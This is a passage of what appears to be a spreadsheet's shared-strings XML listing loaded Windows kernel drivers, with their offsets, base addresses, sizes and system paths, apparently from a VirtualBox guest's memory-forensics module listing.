    <t>0x11000</t>
  </si>
  <si>
    <t>PSHED.dll</t>
  </si>
  <si>
    <t>\SystemRoot\system32\PSHED.dll</t>
  </si>
  <si>
    <t>0x84ec8a20</t>
  </si>
  <si>
    <t>0x8bad0000</t>
  </si>
  <si>
    <t>BOOTVID.dll</t>
  </si>
  <si>
    <t>\SystemRoot\system32\BOOTVID.dll</t>
  </si>
  <si>
    <t>0x84ec89a8</t>
  </si>
  <si>
    <t>0x8bad8000</t>
  </si>
  <si>
    <t>0x42000</t>
  </si>
  <si>
    <t>CLFS.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\system32\CLFS.SYS</t>
  </si>
  <si>
    <t>0x84ec8930</t>
  </si>
  <si>
    <t>0x8bb1a000</t>
  </si>
  <si>
    <t>0x68000</t>
  </si>
  <si>
    <t>CI.dll</t>
  </si>
  <si>
    <t>\SystemRoot\system32\CI.dll</t>
  </si>
  <si>
    <t>0x84ec88b0</t>
  </si>
  <si>
    <t>0x8bc10000</t>
  </si>
  <si>
    <t>0x81000</t>
  </si>
  <si>
    <t>Wdf01000.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\Wdf01000.sys</t>
  </si>
  <si>
    <t>0x84ec8830</t>
  </si>
  <si>
    <t>0x8bc91000</t>
  </si>
  <si>
    <t>0xe000</t>
  </si>
  <si>
    <t>WDFLDR.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\WDFLDR.SYS</t>
  </si>
  <si>
    <t>0x84ec87b8</t>
  </si>
  <si>
    <t>0x8bc9f000</t>
  </si>
  <si>
    <t>0x48000</t>
  </si>
  <si>
    <t>ACPI.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\ACPI.sys</t>
  </si>
  <si>
    <t>0x84ec8738</t>
  </si>
  <si>
    <t>0x8bce7000</t>
  </si>
  <si>
    <t>0x9000</t>
  </si>
  <si>
    <t>WMILIB.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\WMILIB.SYS</t>
  </si>
  <si>
    <t>0x84ec86b8</t>
  </si>
  <si>
    <t>0x8bcf0000</t>
  </si>
  <si>
    <t>msisadrv.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\msisadrv.sys</t>
  </si>
  <si>
    <t>0x84ec2eb8</t>
  </si>
  <si>
    <t>0x8bcf8000</t>
  </si>
  <si>
    <t>0x2a000</t>
  </si>
  <si>
    <t>pci.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\pci.sys</t>
  </si>
  <si>
    <t>0x84ec2e38</t>
  </si>
  <si>
    <t>0x8bd22000</t>
  </si>
  <si>
    <t>0xb000</t>
  </si>
  <si>
    <t>vdrvroot.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\vdrvroot.sys</t>
  </si>
  <si>
    <t>0x84ec2db8</t>
  </si>
  <si>
    <t>0x8bd2d000</t>
  </si>
  <si>
    <t>partmgr.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\partmgr.sys</t>
  </si>
  <si>
    <t>0x84ec2d38</t>
  </si>
  <si>
    <t>0x8bd3e000</t>
  </si>
  <si>
    <t>compbatt.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\compbatt.sys</t>
  </si>
  <si>
    <t>0x84ec2cb8</t>
  </si>
  <si>
    <t>0x8bd46000</t>
  </si>
  <si>
    <t>BATTC.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\BATTC.SYS</t>
  </si>
  <si>
    <t>0x84ec2c38</t>
  </si>
  <si>
    <t>0x8bd51000</t>
  </si>
  <si>
    <t>0x10000</t>
  </si>
  <si>
    <t>volmgr.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\volmgr.sys</t>
  </si>
  <si>
    <t>0x84ec2bb8</t>
  </si>
  <si>
    <t>0x8bd61000</t>
  </si>
  <si>
    <t>0x4b000</t>
  </si>
  <si>
    <t>volmgrx.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\volmgrx.sys</t>
  </si>
  <si>
    <t>0x84ec2b38</t>
  </si>
  <si>
    <t>0x8bdac000</t>
  </si>
  <si>
    <t>0x7000</t>
  </si>
  <si>
    <t>intelide.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\intelide.sys</t>
  </si>
  <si>
    <t>0x84ec2ab8</t>
  </si>
  <si>
    <t>0x8bdb3000</t>
  </si>
  <si>
    <t>PCIIDEX.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\PCIIDEX.SYS</t>
  </si>
  <si>
    <t>0x84ec2a38</t>
  </si>
  <si>
    <t>0x8bdc1000</t>
  </si>
  <si>
    <t>0x16000</t>
  </si>
  <si>
    <t>mountmgr.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\mountmgr.sys</t>
  </si>
  <si>
    <t>0x84ec29b8</t>
  </si>
  <si>
    <t>0x8bb82000</t>
  </si>
  <si>
    <t>vmbus.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\vmbus.sys</t>
  </si>
  <si>
    <t>0x84ec2938</t>
  </si>
  <si>
    <t>0x8bdd7000</t>
  </si>
  <si>
    <t>0x12000</t>
  </si>
  <si>
    <t>winhv.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\winhv.sys</t>
  </si>
  <si>
    <t>0x84ec28b8</t>
  </si>
  <si>
    <t>0x8bde9000</t>
  </si>
  <si>
    <t>atapi.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\atapi.sys</t>
  </si>
  <si>
    <t>0x84ec2838</t>
  </si>
  <si>
    <t>0x8bbac000</t>
  </si>
  <si>
    <t>0x23000</t>
  </si>
  <si>
    <t>ataport.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\ataport.SYS</t>
  </si>
  <si>
    <t>0x84ec27b8</t>
  </si>
  <si>
    <t>0x8bdf2000</t>
  </si>
  <si>
    <t>amdxata.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\amdxata.sys</t>
  </si>
  <si>
    <t>0x84ec2738</t>
  </si>
  <si>
    <t>0x8ba00000</t>
  </si>
  <si>
    <t>0x34000</t>
  </si>
  <si>
    <t>fltmgr.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\fltmgr.sys</t>
  </si>
  <si>
    <t>0x84ec26b8</t>
  </si>
  <si>
    <t>0x8bbcf000</t>
  </si>
  <si>
    <t>fileinfo.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\fileinfo.sys</t>
  </si>
  <si>
    <t>0x84ec2640</t>
  </si>
  <si>
    <t>0x8be1c000</t>
  </si>
  <si>
    <t>0x131000</t>
  </si>
  <si>
    <t>Ntfs.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\Ntfs.sys</t>
  </si>
  <si>
    <t>0x84ec25c0</t>
  </si>
  <si>
    <t>0x8bf4d000</t>
  </si>
  <si>
    <t>0x2b000</t>
  </si>
  <si>
    <t>msrpc.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\msrpc.sys</t>
  </si>
  <si>
    <t>0x84ec2540</t>
  </si>
  <si>
    <t>0x8bf78000</t>
  </si>
  <si>
    <t>0x13000</t>
  </si>
  <si>
    <t>ksecdd.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\ksecdd.sys</t>
  </si>
  <si>
    <t>0x84ec24c8</t>
  </si>
  <si>
    <t>0x8bf8b000</t>
  </si>
  <si>
    <t>0x5e000</t>
  </si>
  <si>
    <t>cng.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\cng.sys</t>
  </si>
  <si>
    <t>0x84ec2440</t>
  </si>
  <si>
    <t>0x8c026000</t>
  </si>
  <si>
    <t>0x2d000</t>
  </si>
  <si>
    <t>VBoxGuest.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\VBoxGuest.sys</t>
  </si>
  <si>
    <t>0x84ec23c8</t>
  </si>
  <si>
    <t>0x8c053000</t>
  </si>
  <si>
    <t>pcw.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\pcw.sys</t>
  </si>
  <si>
    <t>0x84ec2348</t>
  </si>
  <si>
    <t>0x8c061000</t>
  </si>
  <si>
    <t>Fs_Rec.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\Fs_Rec.sys</t>
  </si>
  <si>
    <t>0x84ec22d0</t>
  </si>
  <si>
    <t>0x8c06a000</t>
  </si>
  <si>
    <t>0xb8000</t>
  </si>
  <si>
    <t>ndis.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\ndis.sys</t>
  </si>
  <si>
    <t>0x84ec2250</t>
  </si>
  <si>
    <t>0x8c122000</t>
  </si>
  <si>
    <t>0x3f000</t>
  </si>
  <si>
    <t>NETIO.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\NETIO.SYS</t>
  </si>
  <si>
    <t>0x84ec21d0</t>
  </si>
  <si>
    <t>0x8c161000</t>
  </si>
  <si>
    <t>0x26000</t>
  </si>
  <si>
    <t>ksecpkg.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\ksecpkg.sys</t>
  </si>
  <si>
    <t>0x84ec2150</t>
  </si>
  <si>
    <t>0x8c23e000</t>
  </si>
  <si>
    <t>0x150000</t>
  </si>
  <si>
    <t>tcpip.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\tcpip.sys</t>
  </si>
  <si>
    <t>0x84ec20d0</t>
  </si>
  <si>
    <t>0x8c38e000</t>
  </si>
  <si>
    <t>0x31000</t>
  </si>
  <si>
    <t>fwpkclnt.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\fwpkclnt.sys</t>
  </si>
  <si>
    <t>0x84ec2050</t>
  </si>
  <si>
    <t>0x8c3bf000</t>
  </si>
  <si>
    <t>vmstorfl.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\vmstorfl.sys</t>
  </si>
  <si>
    <t>0x84ec9008</t>
  </si>
  <si>
    <t>0x8c187000</t>
  </si>
  <si>
    <t>volsnap.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\volsnap.sys</t>
  </si>
  <si>
    <t>0x84ec9f88</t>
  </si>
  <si>
    <t>0x8c3c8000</t>
  </si>
  <si>
    <t>spldr.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\spldr.sys</t>
  </si>
  <si>
    <t>0x84ec9f08</t>
  </si>
  <si>
    <t>0x8c3d0000</t>
  </si>
  <si>
    <t>rdyboost.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\rdyboost.sys</t>
  </si>
  <si>
    <t>0x84ec9e90</t>
  </si>
  <si>
    <t>0x8c200000</t>
  </si>
  <si>
    <t>mup.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\mup.sys</t>
  </si>
  <si>
    <t>0x84ec9e10</t>
  </si>
  <si>
    <t>0x8c210000</t>
  </si>
  <si>
    <t>hwpolicy.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\hwpolicy.sys</t>
  </si>
  <si>
    <t>0x84ec9d90</t>
  </si>
  <si>
    <t>0x8c1c6000</t>
  </si>
  <si>
    <t>0x32000</t>
  </si>
  <si>
    <t>fvevol.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\DRIVERS\fvevol.sys</t>
  </si>
  <si>
    <t>0x84ec9d18</t>
  </si>
  <si>
    <t>0x8c218000</t>
  </si>
  <si>
    <t>disk.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\disk.sys</t>
  </si>
  <si>
    <t>0x84ec9c98</t>
  </si>
  <si>
    <t>0x8c000000</t>
  </si>
  <si>
    <t>0x25000</t>
  </si>
  <si>
    <t>CLASSPNP.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\CLASSPNP.SYS</t>
  </si>
  <si>
    <t>0x855ad140</t>
  </si>
  <si>
    <t>0x8c236000</t>
  </si>
  <si>
    <t>Null.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\Null.SYS</t>
  </si>
  <si>
    <t>0x85543418</t>
  </si>
  <si>
    <t>0x8c1f8000</t>
  </si>
  <si>
    <t>Beep.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\Beep.SYS</t>
  </si>
  <si>
    <t>0x85056a50</t>
  </si>
  <si>
    <t>0x8bc00000</t>
  </si>
  <si>
    <t>0xc000</t>
  </si>
  <si>
    <t>vga.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\vga.sys</t>
  </si>
  <si>
    <t>0x8576f4c8</t>
  </si>
  <si>
    <t>0x8bbe0000</t>
  </si>
  <si>
    <t>0x20000</t>
  </si>
  <si>
    <t>VIDEOPRT.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\VIDEOPRT.SYS</t>
  </si>
  <si>
    <t>0x8576e150</t>
  </si>
  <si>
    <t>0x9762d000</t>
  </si>
  <si>
    <t>0xd000</t>
  </si>
  <si>
    <t>watchdog.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\watchdog.sys</t>
  </si>
  <si>
    <t>0x8576f578</t>
  </si>
  <si>
    <t>0x9763a000</t>
  </si>
  <si>
    <t>RDPCDD.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\DRIVERS\RDPCDD.sys</t>
  </si>
  <si>
    <t>0x85770110</t>
  </si>
  <si>
    <t>0x97642000</t>
  </si>
  <si>
    <t>rdpencdd.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\rdpencdd.sys</t>
  </si>
  <si>
    <t>0x85771838</t>
  </si>
  <si>
    <t>0x9764a000</t>
  </si>
  <si>
    <t>rdprefmp.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\rdprefmp.sys</t>
  </si>
  <si>
    <t>0x85773f90</t>
  </si>
  <si>
    <t>0x97652000</t>
  </si>
  <si>
    <t>Msfs.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\Msfs.SYS</t>
  </si>
  <si>
    <t>0x85771cc0</t>
  </si>
  <si>
    <t>0x9765d000</t>
  </si>
  <si>
    <t>Npfs.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\Npfs.SYS</t>
  </si>
  <si>
    <t>0x85771218</t>
  </si>
  <si>
    <t>0x9766b000</t>
  </si>
  <si>
    <t>0x17000</t>
  </si>
  <si>
    <t>tdx.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\tdx.sys</t>
  </si>
  <si>
    <t>0x85771f28</t>
  </si>
  <si>
    <t>0x97682000</t>
  </si>
  <si>
    <t>TDI.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\TDI.SYS</t>
  </si>
  <si>
    <t>0x85771350</t>
  </si>
  <si>
    <t>0x9768e000</t>
  </si>
  <si>
    <t>0x5a000</t>
  </si>
  <si>
    <t>afd.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\afd.sys</t>
  </si>
  <si>
    <t>0x8577f808</t>
  </si>
  <si>
    <t>0x976e8000</t>
  </si>
  <si>
    <t>0x33000</t>
  </si>
  <si>
    <t>netbt.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\DRIVERS\netbt.sys</t>
  </si>
  <si>
    <t>0x857737d0</t>
  </si>
  <si>
    <t>0x9771b000</t>
  </si>
  <si>
    <t>wfplwf.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\wfplwf.sys</t>
  </si>
  <si>
    <t>0x85780188</t>
  </si>
  <si>
    <t>0x97722000</t>
  </si>
  <si>
    <t>0x1f000</t>
  </si>
  <si>
    <t>pacer.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\pacer.sys</t>
  </si>
  <si>
    <t>0x85780aa8</t>
  </si>
  <si>
    <t>0x97741000</t>
  </si>
  <si>
    <t>netbios.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\netbios.sys</t>
  </si>
  <si>
    <t>0x85781100</t>
  </si>
  <si>
    <t>0x9774f000</t>
  </si>
  <si>
    <t>0x49000</t>
  </si>
  <si>
    <t>VBoxSF.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\VBoxSF.sys</t>
  </si>
  <si>
    <t>0x857945c0</t>
  </si>
  <si>
    <t>0x97798000</t>
  </si>
  <si>
    <t>wanarp.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\wanarp.sys</t>
  </si>
  <si>
    <t>0x857956a8</t>
  </si>
  <si>
    <t>0x977ab000</t>
  </si>
  <si>
    <t>termdd.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\termdd.sys</t>
  </si>
  <si>
    <t>0x85795130</t>
  </si>
  <si>
    <t>0x977bc000</t>
  </si>
  <si>
    <t>0x43000</t>
  </si>
  <si>
    <t>rdbss.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\rdbss.sys</t>
  </si>
  <si>
    <t>0x857985e0</t>
  </si>
  <si>
    <t>0x97600000</t>
  </si>
  <si>
    <t>0xa000</t>
  </si>
  <si>
    <t>nsiproxy.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\nsiproxy.sys</t>
  </si>
  <si>
    <t>0x857994b8</t>
  </si>
  <si>
    <t>0x9760a000</t>
  </si>
  <si>
    <t>mssmbios.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\mssmbios.sys</t>
  </si>
  <si>
    <t>0x85799438</t>
  </si>
  <si>
    <t>0x97614000</t>
  </si>
  <si>
    <t>discache.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\discache.sys</t>
  </si>
  <si>
    <t>0x8579a628</t>
  </si>
  <si>
    <t>0x96a3f000</t>
  </si>
  <si>
    <t>0x64000</t>
  </si>
  <si>
    <t>csc.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\csc.sys</t>
  </si>
  <si>
    <t>0x857a0210</t>
  </si>
  <si>
    <t>0x96aa3000</t>
  </si>
  <si>
    <t>0x1a000</t>
  </si>
  <si>
    <t>dfsc.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\dfsc.sys</t>
  </si>
  <si>
    <t>0x857a2768</t>
  </si>
  <si>
    <t>0x96abd000</t>
  </si>
  <si>
    <t>blbdrive.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\blbdrive.sys</t>
  </si>
  <si>
    <t>0x857a32f8</t>
  </si>
  <si>
    <t>0x96acb000</t>
  </si>
  <si>
    <t>0x21000</t>
  </si>
  <si>
    <t>tunnel.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\tunnel.sys</t>
  </si>
  <si>
    <t>0x8502a480</t>
  </si>
  <si>
    <t>0x96aec000</t>
  </si>
  <si>
    <t>0x18000</t>
  </si>
  <si>
    <t>i8042prt.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\i8042prt.sys</t>
  </si>
  <si>
    <t>0x857b2878</t>
  </si>
  <si>
    <t>0x96b04000</t>
  </si>
  <si>
    <t>kbdclass.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\kbdclass.sys</t>
  </si>
  <si>
    <t>0x857b4c78</t>
  </si>
  <si>
    <t>0x96b11000</t>
  </si>
  <si>
    <t>VBoxMouse.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\VBoxMouse.sys</t>
  </si>
  <si>
    <t>0x857b5c20</t>
  </si>
  <si>
    <t>0x96b3c000</t>
  </si>
  <si>
    <t>mouclass.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\mouclass.sys</t>
  </si>
  <si>
    <t>0x857b4928</t>
  </si>
  <si>
    <t>0x96b49000</t>
  </si>
  <si>
    <t>0x2f000</t>
  </si>
  <si>
    <t>VBoxVideo.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\VBoxVideo.sys</t>
  </si>
  <si>
    <t>0x857b4200</t>
  </si>
  <si>
    <t>0x96b78000</t>
  </si>
  <si>
    <t>0x1d000</t>
  </si>
  <si>
    <t>E1G60I32.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\E1G60I32.sys</t>
  </si>
  <si>
    <t>0x857b4578</t>
  </si>
  <si>
    <t>0x96b95000</t>
  </si>
  <si>
    <t>0x1e000</t>
  </si>
  <si>
    <t>ac97intc.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\ac97intc.sys</t>
  </si>
  <si>
    <t>0x857cd368</t>
  </si>
  <si>
    <t>0x96bb3000</t>
  </si>
  <si>
    <t>portcls.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\portcls.sys</t>
  </si>
  <si>
    <t>0x857b4a30</t>
  </si>
  <si>
    <t>0x96be2000</t>
  </si>
  <si>
    <t>0x19000</t>
  </si>
  <si>
    <t>drmk.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\drmk.sys</t>
  </si>
  <si>
    <t>0x858090f0</t>
  </si>
  <si>
    <t>0x96a00000</t>
  </si>
  <si>
    <t>ks.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\ks.sys</t>
  </si>
  <si>
    <t>0x85812008</t>
  </si>
  <si>
    <t>0x96a34000</t>
  </si>
  <si>
    <t>0x4000</t>
  </si>
  <si>
    <t>CmBatt.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\CmBatt.sys</t>
  </si>
  <si>
    <t>0x854b4560</t>
  </si>
  <si>
    <t>0x97620000</t>
  </si>
  <si>
    <t>CompositeBus.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\CompositeBus.sys</t>
  </si>
  <si>
    <t>0x857a1c18</t>
  </si>
  <si>
    <t>0x9cc27000</t>
  </si>
  <si>
    <t>AgileVpn.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\AgileVpn.sys</t>
  </si>
  <si>
    <t>0x857e12e8</t>
  </si>
  <si>
    <t>0x9cc39000</t>
  </si>
  <si>
    <t>rasl2tp.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\rasl2tp.sys</t>
  </si>
  <si>
    <t>0x857d1388</t>
  </si>
  <si>
    <t>0x9cc51000</t>
  </si>
  <si>
    <t>ndistapi.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\ndistapi.sys</t>
  </si>
  <si>
    <t>0x857d19a0</t>
  </si>
  <si>
    <t>0x9cc5c000</t>
  </si>
  <si>
    <t>0x22000</t>
  </si>
  <si>
    <t>ndiswan.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\ndiswan.sys</t>
  </si>
  <si>
    <t>0x857d60a0</t>
  </si>
  <si>
    <t>0x9cc7e000</t>
  </si>
  <si>
    <t>raspppoe.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\raspppoe.sys</t>
  </si>
  <si>
    <t>0x857d9008</t>
  </si>
  <si>
    <t>0x9cc96000</t>
  </si>
  <si>
    <t>raspptp.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\raspptp.sys</t>
  </si>
  <si>
    <t>0x857daf88</t>
  </si>
  <si>
    <t>0x9ccad000</t>
  </si>
  <si>
    <t>rassstp.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\rassstp.sys</t>
  </si>
  <si>
    <t>0x857da1a0</t>
  </si>
  <si>
    <t>0x9ccc4000</t>
  </si>
  <si>
    <t>rdpbus.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\rdpbus.sys</t>
  </si>
  <si>
    <t>0x85841620</t>
  </si>
  <si>
    <t>0x9ccce000</t>
  </si>
  <si>
    <t>0x2000</t>
  </si>
  <si>
    <t>swenum.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\swenum.sys</t>
  </si>
  <si>
    <t>0x85838ef0</t>
  </si>
  <si>
    <t>0x9ccd0000</t>
  </si>
  <si>
    <t>umbus.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\umbus.sys</t>
  </si>
  <si>
    <t>0x857f9f88</t>
  </si>
  <si>
    <t>0x9ccde000</t>
  </si>
  <si>
    <t>NDProxy.SYS</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\NDProxy.SYS</t>
  </si>
  <si>
    <t>0x85543c28</t>
  </si>
  <si>
    <t>0x9ccef000</t>
  </si>
  <si>
    <t>crashdmp.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\crashdmp.sys</t>
  </si>
  <si>
    <t>0x855d9c00</t>
  </si>
  <si>
    <t>0x9ccfc000</t>
  </si>
  <si>
    <t>dump_ataport.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\dump_dumpata.sys</t>
  </si>
  <si>
    <t>0x85e40c70</t>
  </si>
  <si>
    <t>0x9cd07000</t>
  </si>
  <si>
    <t>dump_atapi.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\dump_atapi.sys</t>
  </si>
  <si>
    <t>0x85e4d958</t>
  </si>
  <si>
    <t>0x9cd10000</t>
  </si>
  <si>
    <t>dump_dumpfve.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\Drivers\dump_dumpfve.sys</t>
  </si>
  <si>
    <t>0x85e48f08</t>
  </si>
  <si>
    <t>0x99100000</t>
  </si>
  <si>
    <t>0x25f000</t>
  </si>
  <si>
    <t>win32k.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\win32k.sys</t>
  </si>
  <si>
    <t>0x85eb4930</t>
  </si>
  <si>
    <t>0x9cd21000</t>
  </si>
  <si>
    <t>Dxapi.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\Dxapi.sys</t>
  </si>
  <si>
    <t>0x85eba4a0</t>
  </si>
  <si>
    <t>0x99360000</t>
  </si>
  <si>
    <t>dxg.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\dxg.sys</t>
  </si>
  <si>
    <t>0x85eeb0b0</t>
  </si>
  <si>
    <t>0x9cd2b000</t>
  </si>
  <si>
    <t>monitor.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\monitor.sys</t>
  </si>
  <si>
    <t>0x84f77858</t>
  </si>
  <si>
    <t>0x99390000</t>
  </si>
  <si>
    <t>TSDDD.dll</t>
  </si>
  <si>
    <t>\SystemRoot\System32\TSDDD.dll</t>
  </si>
  <si>
    <t>0x85e39df8</t>
  </si>
  <si>
    <t>0x993d0000</t>
  </si>
  <si>
    <t>0x15000</t>
  </si>
  <si>
    <t>VBoxDisp.dll</t>
  </si>
  <si>
    <t>\SystemRoot\System32\VBoxDisp.dll</t>
  </si>
  <si>
    <t>0x86033d18</t>
  </si>
  <si>
    <t>0x9cd36000</t>
  </si>
  <si>
    <t>0x1b000</t>
  </si>
  <si>
    <t>luafv.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\luafv.sys</t>
  </si>
  <si>
    <t>0x857fe4a8</t>
  </si>
  <si>
    <t>0x9cd51000</t>
  </si>
  <si>
    <t>lltdio.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\lltdio.sys</t>
  </si>
  <si>
    <t>0x85809678</t>
  </si>
  <si>
    <t>0x9cd61000</t>
  </si>
  <si>
    <t>rspndr.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\rspndr.sys</t>
  </si>
  <si>
    <t>0x85969f90</t>
  </si>
  <si>
    <t>0x9cd74000</t>
  </si>
  <si>
    <t>HTTP.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\HTTP.sys</t>
  </si>
  <si>
    <t>0x8598d848</t>
  </si>
  <si>
    <t>0x9cc00000</t>
  </si>
  <si>
    <t>bowser.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\bowser.sys</t>
  </si>
  <si>
    <t>0x8598f008</t>
  </si>
  <si>
    <t>0x8bfe9000</t>
  </si>
  <si>
    <t>mpsdrv.sys</t>
  </si>
  <si>
    <t>\SystemRoot\System32\drivers\mpsdrv.sys</t>
  </si>
  <si>
    <t>0x85991c38</t>
  </si>
  <si>
    <t>0x9e81b000</t>
  </si>
  <si>
    <t>mrxsmb.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\mrxsmb.sys</t>
  </si>
  <si>
    <t>0x85997ce0</t>
  </si>
  <si>
    <t>0x9e83e000</t>
  </si>
  <si>
    <t>0x3c000</t>
  </si>
  <si>
    <t>mrxsmb10.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\mrxsmb10.sys</t>
  </si>
  <si>
    <t>0x85991630</t>
  </si>
  <si>
    <t>0x9e87a000</t>
  </si>
  <si>
    <t>0x1c000</t>
  </si>
  <si>
    <t>mrxsmb20.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\DRIVERS\mrxsmb20.sys</t>
  </si>
  <si>
    <t>0x8616fe18</t>
  </si>
  <si>
    <t>0x9e8ae000</t>
  </si>
  <si>
    <t>0x98000</t>
  </si>
  <si>
    <t>peauth.sys</t>
  </si>
  <si>
    <t>\SystemRoot\system32\drivers\peauth.sys</t>
  </si>
  <si>
    <t>0x8616cb28</t>
  </si>
  <si>
    <t>0x9e946000</t>
  </si>
  <si>
    <t>srvnet.sys</t>
